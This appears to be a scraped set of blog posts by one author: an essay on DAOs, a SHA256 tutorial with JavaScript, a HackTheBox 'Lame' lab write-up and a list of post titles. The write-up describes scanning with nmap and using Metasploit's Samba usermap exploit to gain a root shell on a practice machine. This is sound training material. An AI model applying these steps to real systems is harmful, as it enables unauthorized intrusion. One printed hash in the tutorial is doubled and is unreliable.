The governance tokens given to the members are a way to control the governance inside the DAO. Let's work with an example here: A member of the DAO submits a proposal for voting. Each member who holds a token will get the right to vote according to the number of tokens they have (it can vary depending on the cases), but each vote will have its anonimity and privacy assured. This way, the members are free to democratically vote to the proposals, which decisions will be protected by the smart contracts. No bribery or corruption can take place in such scenario, and even under-pressure blackmail will be avoided. With no central power, it's impossible to influence the governance inside the organization without influencing the majority of its members.
Smart contracts, the leading force behind the curtains, store the rules and processes in code. This automated way is safer than leaving all the management to people. Let's say a company wants to cover an employee's travel expenses. A contract can be created to deliver the money to that employee, instantly. The whole transaction is transparent and auditable, which means it's really easy for everyone to just check how much money was taken from that contract. Even salaries can be paid in this automated way, and a job position that offers X dollars/month will deliver that amount in a indiscriminated way, agnostic to beliefs, race or gender. The equality, transparency and precision that smart contracts bring into the DAO's game is unique, and the praise they get is justified.
This openness and transparency can be observed in the whole structure of a DAO. When multiple parts have no previous reason to trust each other - or when they even don't know each other - the smart contracts ensure a way to coordinate resources in a trustworthy and auditable way. Governance inside a DAO is geography agnostic and censorship-resistant, meaning one can vote for the proposals wherever they are, in a platform that isn't easily censored as some apps and websites that rely on a single IP address. It also rewards contribution, meaning that one can be rewarded once the DAO succeeds, and the more money it gets, the more the contributor will profit from the early-stage investments they made.

...and disadvantages.

But not everything in a DAO is a dream come true. As Uncle Ben once said, "with great power comes great responsibility". Opensource code can lead to easier information-gathering processes from hackers, and also the exposition of the organization's business plan.

With your source code out there in the open, it's easy for any malicious agent to find it and try to exploit it. The famous case about The DAO Hack, where millons of dollars were transfered by using a bug in the originals The DAO smart contracts, really created an impact, forcing Ethereum to be hard forked into Ethereum and Ethereum Classic. For that reason, investments in AppSecurity, Testing and Threat Hunting are necessary, because DAOs usually are connected to a huge amount of stakeholders, and also these stakeholder's money. The code must be really impecable and adamant before the implementation, once blockchain technology doesn't allow edits or deletions, only appends: Once the smart contract is in the blockchain, it's there forever.
Another "problem" with the transparency provided by the opensource nature of DAOs is that your business plan will also be out there for everyone to see and even copy. While many companies up to this day were created based on secrecy of their plans, this new implementation might be a new paradigm shift in how companies create their businesses. Based on the what we can observe from crypto business models, having an opensource business plan is not necessarily a drawback. Most of those business models are based on a virtuous cycle, a network effect that spirals upwards from the moment the company is created.
It happens because of the uniqueness of this model in the corporate world. Let's say you create your DAO with your unique business plan. It allows day one investments from all over the world, because the cryptocurrency is the same everywhere and it won't rely on banks and countries regulations. Someone from across the globe can fund your company minutes after it was deployed on the chain. This way, the number of users and the adoption rises constantly and it will provide a stronger network based on your DAO. It is simple: The more the risk around your model decreases, the more its defensibility rises, making your company way more trustworthy.
Now let's say someone observes how well your company is doing and decides to do exactly the same. They go there, copy your code, and start their business all over again. They will have a whole new network, without as many users and adoption - and, consequentially, less risk - as yours. A newcomer, having to decide between a well-established network and a completely new network, will most likely go for the well-established one, especially when their money is at stake. If your DAO proved to be successful and reliable with time, then you'd have no problem whatsoever to attract new users.

How will DAOs shape the future (and the present!)

An educational organization open for everyone in the world, independent and self-governing? A charity institution free from corruption and funding projects chosen democratically? All these scenarios are possible with DAOs.

Now that you got a gist of how a DAO works, the possibilities are enormous in this field. They can restructure the future, so we can abandon the centralized, trust-dependent model we are based on right now. Let's make an exercise and imagine what problems we can tackle with this new model.
Think about Kickstarter, or any other crowdfunding platform. They usually function like this: Someone goes there and posts a project, its goals and how people can contribute to it. Once the project is funded, all the money goes to the creator of the project, and people must expect that they will use that money correctly. This dependency on trust might be prejudicial, but smart contracts can assure it can be fulfilled with a few lines of code. How would it work? Imagine that, instead of transfering the money to the creator of the project, it transfers it to a pooled investment fund. Then, everytime the manager or the creator wants to use some of that money to buy something, they should provide a proposal, that would be voted by each member in that pool. Only if it's successfully voted and accepted, the money could be transfered to the manager/creator or directly to some other cryptowallet, and the project could advance. This way it would be easier to track the transfers and expenses, and everyone would have a voice in voting for where the money would go.
Now let's think about an University or school. A lot of what happens there is directly influenced by a rector, or even a government, and a most of the money comes from investments from shady sources demanding biased researchs, and no information is truely free. In Brazil, for example, we are dealing with problems like this right now, with the government allocating money meant to be used in research and education somewhere else. In a DAO Model, the decisions where the money would be invested would depend on the teachers and students, and they would vote where they would like to see that money. This is a way to promote a free, unbiased development of information and allocation of money.
In general, DAOs are still growing and there is space out there for all sorts of new ideas. MakerDAO, for example, is leading this movement, and they are also responsible for DAI, a top stablecoin. Aragon, on the other hand, is facilitating people's adoption to this new model, and you can create a simple DAO in minutes using their boilerplate code. The possibilities are enourmous, and the time is right: We just need to educate ourselves better about it to start creating our way into this new paradigm.

Understanding SHA256

Artur Serra — Wed, 08 Jul 2020 05:00:00 +0000

As I dive deeper into my studies related to blockchain and blockchain development, I find some intriguing core concepts that shine a light towards the inner intricacies of how the blockchains work.

One of these concepts that are vital to the blockchain functionality is called SHA256. It is a Secure Hashing Algorithm, commonly used for digital signatures and authentication. But before we try to get a better grasp of it, let's understand what a Hash Algorithm is.

Let's say you want to transfer some data from one point to another, and you need this data to be secure and easily verifiable. By using the Hash Algorithms, you are going to crush down that big chunk of data into a single line - a hexadecimal value that summarizes what is contained in that file.

To illustrate that, let's use this awesome website called AndersBrownworth.com. They have a tab focused on Hashing, and we can go there and play with any values inside the Data box, and we can observe how the hash value is going to change. For this example, I'm going to use a short story from Hans Christian Andersen that I really like: The Little Match Girl.

The original short story has 5456 characters, but when it's hashed down, it will be represented by a 64 characters string.

It is important to note that, no matter how many characters you pass through a hashing algorithm, you will always get a string with the same amount of characters as a result. Even if we write a simple "Hello there" in the data box, it will return a 64 characters string to us.

This hexadecimal value appears to be random, but it isn't. As it was said before, it is dependent on the original value, so even if we make small changes in the text, it will return a different value. For example, the hash value for our saddening short-story is 5548efc1d8e6a691a730a042e3f32b26e163ce9ba050116edc2af3b2705f49cb. That combination of 5456 characters in that same order will always return this value. But if we add an "A" to the beginning of the text, we will get a different result: 9ad55f658a3636ca079a0fe74b5a06a914977ba15b4db7f012ae2e47c8d1417b.

Even if we remove the extra "A" we added, going back to the original text, and then we change a semicolon for a regular comma, we still get different results: 2de2316e5e5f9e10ee899a7f42dc51a19f7fd9a219dae672ada1a80f5c74134a. So this might show how powerful SHA256 is, especially when for digital signatures.

This Avalanche Effect, this event of changing a letter, a signal or even a single byte in the original file and with that you modify completely the hash output, is one of the three requirements of a hashing function. The other two being Speed, which is also fairly great in SHA256, because it can find a good balance between fast enough - so it will improve its adoption - and slow enought - so it's not easy to crack - and Collision Resistant, which means it will prevent that two different inputs will provide the same output. Due to its calculations it's almost impossible to naturally create the same output with two different inputs, but if one can manipulate the function to artificially create a collision, it could result in a security break.

Summarizing, the process goes like this:

And how is it used in the various blockchains out there? With the hashing function, it is possible to create a different hash to each block in the blockchain. The reason for this is to provide an unique identifier for every block, allowing us to reference a block by its "digital fingerprint", the hash. It also allows the connection between to blocks, creating a chain, which I am going to explain in a future text.

Now, to implement a basic usage of the SHA256 with JavaScript, let's install a npm package called CryptoJS. Its installation is quite simple, you just need to run

npm install crypto-js

Once it's done, create a JavaScript file in the same folder you installed CryptoJS and open it.

Now we are going to import the CryptoJS package using:

const CryptoJS = require("crypto-js");

Then, we just need to call this function we just imported, using:

let hash = CryptoJS.SHA256("Message")

This step will create a Word Array based on the message input. So let's change the input and add a functionality that will encode the Word Array into a hexadecimal string:

let hashHex = hash.toString(CryptoJS.enc.Hex)

And then, to log it to our terminal, we'll use a regular console.log

console.log(hashHex)

In the end, the code will look more or less like this:

Now, time to test it. By running a node sha256.js, we can get the result in the terminal

We got a hexadecimal value ba7c7bc89cad8d2b8c024ab063493af7d2e310277c64e6d9cfa822deca852152ba7c7bc89cad8d2b8c024ab063493af7d2e310277c64e6d9cfa822deca852152.
If we go back to our hashing companion AndersBrownworth.com and write the same input, we get the same result! Nice, it worked! (:

With this we conclude our first approach to SHA256, understanding how it works, why it's used in blockchain technologies and how to easily implement it with JavaScript.
If you want to keep studying this subject, I'll leave down below some links that might be useful to kickstart your research! Keep coding!

HackTheBox Write-Ups - Lame

Artur Serra — Thu, 02 Jul 2020 05:23:25 +0000

Lame is, by no means, a difficult box. It also figures as the first Linux Machine from TJ_Null's OSCP-Like VM's list, so it's a nice place to start.

> Phase One - Information Gathering

As always, we start with a simple nmap command, just to check which ports are open and which services are running in those ports.

-T4 Scan Speed. Fast and noisy, but okay for this lab.
-p Scans all ports

Then, once I've found all open ports, I go for an -A with using also those ports as parameters, so we can get all the information we can from them, and then proceed to investigate the vulnerabilities we find.

-T4 Scan speed
-p21,22,139,445,3632 The ports I want to focus my scan on
-A Returns all the information nmap can about those ports

We can also get information from the scripts that can be useful to exploit those open ports.

I'd like to say I pretty much enjoy this method, because it does the hard work only with the necessary ports, saving us some time, but it's not The Right Method to follow. It's important to explore and experiment with those methods, and learn how to use them in a way you're satisfied. The most important thing I'm learning about pentesting is to develop your methodology as you go, in a way it will be easier for you to understand the steps to a successful process.

Back to our recon, it's good to note two things here are that are really eye-catching: SMB usually indicates a go-to port to exploit. But on Port 21 it also has a ftp, which allows an anonymous login. So let's try it first.

Running searchsploit to look for exploits related to tis FTP (using, as parameter, its version - especially because versions can be really good starting points to look for an exploit), we get the following results

> Phase Two - Exploitation

We then go to metasploit and look for our vulnerabilty. Luckily we find a backdoor that is rated "excellent", which is good news (usually).

Now we run use 3 to use the third option displayed in the table. Then, once we're inside our exploit's tab, we run options to check what we need to objectively run this exploit. It only has two required fields, one being RPORT which is already prefilled with the target port 21, and a RHOSTS field, yet to be completed. We run set RHOSTS 10.10.10.3, using our target's IP, and then we run options again just to check if everything is on order.

We try running the exploit twice, but it fails. In my first attempts to use Metasploit I got really confused on why it was happening, but with time I learned it's quite common for it to happen, depending on how patches come and solve those vulnerabilities. But it's okay, we just need to jump to another port and try another exploit.

As I said before, SMB/Samba are really good places to start exploiting, since they are quite dangerous. In our information gathering tab, we found a Samba with a very specific version. Let's try looking for this one now on Metasploit.

As we can see, one of the exploits is related to Metasploit, so since we have this useful tool already in our hands, let's jump into it first and see what we can get.

Running a "search samba usermap script" on Metasploit, we find a lot of options, and paying attention to then, we find the one that matches exactly what we are looking for

We just need to run use 151, {151 being the code for that exploit shown in the first column}, to access it. Running options we see what needs to be set.

We then configure our exploit with set RHOSTS, running options once more just to check if all the required and important information are filled.

With all the required fields filled, we just need to run the exploit...

And voila, we have a shell! Nice!

> Phase Three - Post-Exploitation

We start this phase running a pwd and a whoami to see in which directory we are, and in which folder we are.

Nice, we already have root privileges, so no need to escalate here. Now, we just need to go after our flags on user.txt and root.txt

And that's it! Lame has been pwned! (:

HackTheBox Write-Ups - An Introduction

Artur Serra — Thu, 02 Jul 2020 04:32:12 +0000

Hello, internet person,

The time to write my first post here on Dev.to has come! After struggling to think of an idea or really cool and worthy project to start writing some things down, I finally decided to try and write something that was almost done: My write-ups.

A bit of context first: HackTheBox is this awesome platform in which you can try your pentesting skills with some virtual machines - or boxes - packed with some vulnerabilities ready to be exploited. Sounds nice, huh? As a cybersecurity student, it's a must for me to experiment with those labs, especially in order to pursue the OSCP - Offensive Security Certified Professional - a very important cybersecurity certification.

To be quite honest, I still don't know if I want to take the OSCP as of now... but I understand how taking it and the Advanced Web Attacks Exploitation certification's exam can be really useful to my main goal of developing my developer skills with a good base in Security. So, why not start preparing for it right now, even if in a slower pace?

That being said, after a lot of research and this awesome story from Rana Khalil about her journey to get her OSCP Cert, I finally had a roadmap. Now, time to follow it.

The targets were finally there, since I decided to follow her footsteps and also try to hack all the machines from TJ_Null's OSCP-Like VM's list. Important to note that those machines are always being updated, which makes this list relevant at all times. Also, he has a list for VulnHub machines, which I might consider every now and then when my HackTheBox subscription gets expired (since I'm not in an automatic subscription, leaving it for when I decide to focus on Retired Machines, only accessible with the VIP account).

Now I have the roadmap and the targets, but... something is still missing: I need to learn how to walk it. Gladly, I found really good tutors in University, but I was a total, complete noob in all things related to pentest, and I still needed a nice place to start. That's where I found Heath Adam's Practical Ethical Hacking course at Udemy. His methodology just clicked with me. It was way easier to understand the basic concepts, even though I still didn't finish the course - It's paused right now while I write this - because his way of explaining things just inspired me to start this post and all this plan to document my way through TJ_Null's list.

Without further ado, let's go hack some things!

DEV Community: Artur Serra

Rustlings #1 (Or The Power of Comments in Programming)

I. Introduction

II. Comment the Method

Why is it important?

Best practices for commenting the method

III. Self-Documenting Code

What is self-documenting code?

What are the best practices for writing self-documenting code?

Examples of self-documenting code

IV. Commenting Tricky Stuff

Why it is important to comment tricky or non-obvious parts of the code

Best practices for commenting tricky code

Examples of tricky code and how to comment it effectively

VI. Conclusion

Write-up: KodeKloud Sysadmin (Set or Change System's Timezone in Linux)

Write-up: KodeKloud Sysadmin (Create a Non-interactive Shell)

Getting started with Penetration Testing and building your own pentest methodology.

What is Pentesting?

What is the need of a Penetration Test?

How often should I implement a Penetration Test?

The difference between penetration test and vulnerability assessment/red teaming/bug bounty/CTF

Setting Up a Pentesting Lab

Installing the Virtual Machine

Installing your Operational System

Building Your Pentest Methodology

Phase 1 - Pre-Engagement Phase

Phase 2 - Information Gathering

Phase 3 - Enumeration

Phase 4 - Vulnerability Analysis

Phase 5 - Exploitation Phase

Phase 6 - Post-Exploitation Phase

Phase 7 - Reporting Phase

Conclusion

An Introdution to Networks - A TryHackMe Introductory Networking WriteUp

Intro

Acknowledgements

Networking Fundamentals

OSI Model - An Overview

The Data Journey across the Network

7 - Application Layer

6 - Presentation Layer

5 - Session Layer

4 - Transport Layer

3 - Network Layer

2 - Data Link Layer

1 - Physical Layer

Encapsulation

TCP/IP Model

Networking Tools - Ping

Networking Tools - Traceroute

Networking Tools - WHOIS

Networking Tools - Dig

Bibliography

Resources to get you started in Cybersecurity (for free).

Okay, but how do I get started with all of this?

Some additional resources.

TryHackMe - ToolsRUs WriteUp

The Power of DAOs

Introduction

DAO's advantages...

...and disadvantages.

How will DAOs shape the future (and the present!)

Understanding SHA256

HackTheBox Write-Ups - Lame

Table Of Contents

HackTheBox Write-Ups - An Introduction

Table Of Contents